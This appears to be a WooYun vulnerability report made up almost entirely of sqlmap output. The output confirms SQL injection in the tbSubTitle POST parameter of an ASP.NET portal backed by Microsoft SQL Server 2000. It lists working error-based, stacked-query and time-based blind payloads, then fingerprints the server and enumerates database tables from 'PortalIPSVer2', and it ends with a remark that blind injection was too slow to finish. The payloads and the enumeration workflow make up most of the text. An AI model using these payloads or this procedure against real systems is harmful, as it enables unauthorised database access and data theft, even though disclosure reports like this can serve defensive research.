WooYun.org

sqlmap identified the following injection point(s) with a total of 210 HTTP(s) requests:
---
Parameter: tbSubTitle (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __VIEWSTATE=dDwtMjEzNzE2Nzg0Nzt0PDtsPGk8MT47PjtsPHQ8O2w8aTwxMT47PjtsPHQ8QDA8cDxwPGw8TWFpbk9yZGVyO0RhdGFLZXlzO1BhZ2VDb3VudDtWaXJ0dWFsSXRlbUNvdW50O09yZGVyO18hRGF0YVNvdXJjZUl0ZW1Db3VudDtfIUl0ZW1Db3VudDtDdXJyZW50UGFnZUluZGV4Oz47bDxJbmZvR3VpZDtsPD47aTwxPjtpPDA+O0luZm9HdWlkO2k8MD47aTwwPjtpPDA+Oz4+Oz47Ozs7Ozs7Ozs7PjtsPGk8MD47PjtsPHQ8O2w8aTwzPjs+O2w8dDw7bDxpPDA+Oz47bDx0PHA8cDxsPENvbHVtblNwYW47PjtsPGk8ND47Pj47Pjs7Pjs+Pjs+Pjs+Pjs+Pjs+Pjs+JiKNDu1oGAO0QpqBGnAbVot0dxQ=&__VIEWSTATEGENERATOR=4895100B&tbTitle=&tbSubTitle=a' AND 1453=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (1453=1453) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(122)+CHAR(113))) AND 'omDb' LIKE 'omDb&tbKeywords=&btnSearch=%E6%90%9C%E7%B4%A2
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: __VIEWSTATE=dDwtMjEzNzE2Nzg0Nzt0PDtsPGk8MT47PjtsPHQ8O2w8aTwxMT47PjtsPHQ8QDA8cDxwPGw8TWFpbk9yZGVyO0RhdGFLZXlzO1BhZ2VDb3VudDtWaXJ0dWFsSXRlbUNvdW50O09yZGVyO18hRGF0YVNvdXJjZUl0ZW1Db3VudDtfIUl0ZW1Db3VudDtDdXJyZW50UGFnZUluZGV4Oz47bDxJbmZvR3VpZDtsPD47aTwxPjtpPDA+O0luZm9HdWlkO2k8MD47aTwwPjtpPDA+Oz4+Oz47Ozs7Ozs7Ozs7PjtsPGk8MD47PjtsPHQ8O2w8aTwzPjs+O2w8dDw7bDxpPDA+Oz47bDx0PHA8cDxsPENvbHVtblNwYW47PjtsPGk8ND47Pj47Pjs7Pjs+Pjs+Pjs+Pjs+Pjs+Pjs+JiKNDu1oGAO0QpqBGnAbVot0dxQ=&__VIEWSTATEGENERATOR=4895100B&tbTitle=&tbSubTitle=a';WAITFOR DELAY '0:0:5'--&tbKeywords=&btnSearch=%E6%90%9C%E7%B4%A2
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (comment)
Payload: __VIEWSTATE=dDwtMjEzNzE2Nzg0Nzt0PDtsPGk8MT47PjtsPHQ8O2w8aTwxMT47PjtsPHQ8QDA8cDxwPGw8TWFpbk9yZGVyO0RhdGFLZXlzO1BhZ2VDb3VudDtWaXJ0dWFsSXRlbUNvdW50O09yZGVyO18hRGF0YVNvdXJjZUl0ZW1Db3VudDtfIUl0ZW1Db3VudDtDdXJyZW50UGFnZUluZGV4Oz47bDxJbmZvR3VpZDtsPD47aTwxPjtpPDA+O0luZm9HdWlkO2k8MD47aTwwPjtpPDA+Oz4+Oz47Ozs7Ozs7Ozs7PjtsPGk8MD47PjtsPHQ8O2w8aTwzPjs+O2w8dDw7bDxpPDA+Oz47bDx0PHA8cDxsPENvbHVtblNwYW47PjtsPGk8ND47Pj47Pjs7Pjs+Pjs+Pjs+Pjs+Pjs+Pjs+JiKNDu1oGAO0QpqBGnAbVot0dxQ=&__VIEWSTATEGENERATOR=4895100B&tbTitle=&tbSubTitle=a' WAITFOR DELAY '0:0:5'--&tbKeywords=&btnSearch=%E6%90%9C%E7%B4%A2
---
web server operating system: Windows
web application technology: ASP.NET, Nginx, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2000
current database: 'PortalIPSVer2'
[18:48:34] [INFO] retrieved: dbo.AppGroup
[18:51:02] [INFO] retrieved: dbo.Application
[18:52:50] [INFO] retrieved: dbo.Attachment
[18:54:51] [INFO] retrieved: dbo.Category
[18:56:27] [INFO] retrieved: dbo.CategoryInfoType
[18:58:32] [INFO] retrieved: dbo.CategoryRuleRelation
[19:01:14] [INFO] retrieved: dbo.CategoryType
[19:03:40] [INFO] retrieved: dbo.Comment
[19:06:52] [INFO] retrieved: dbo.CommentReceiver
[19:10:39] [INFO] retrieved: dbo.D99_CMD
[19:13:17] [INFO] retrieved: dbo.D99_REG
[19:14:53] [INFO] retrieved: dbo.D99_Tmp
[19:16:58] [INFO] retrieved: dbo.dtproperties
[19:22:24] [INFO] retrieved: dbo.Group
[19:35:19] [INFO] retrieved: dbo.InfoCategoryView
[19:36:47] [INFO] retrieved: dbo.InfoReceiver
[19:38:30] [INFO] retrieved: dbo.Inform
盲注太慢了不等了。。。。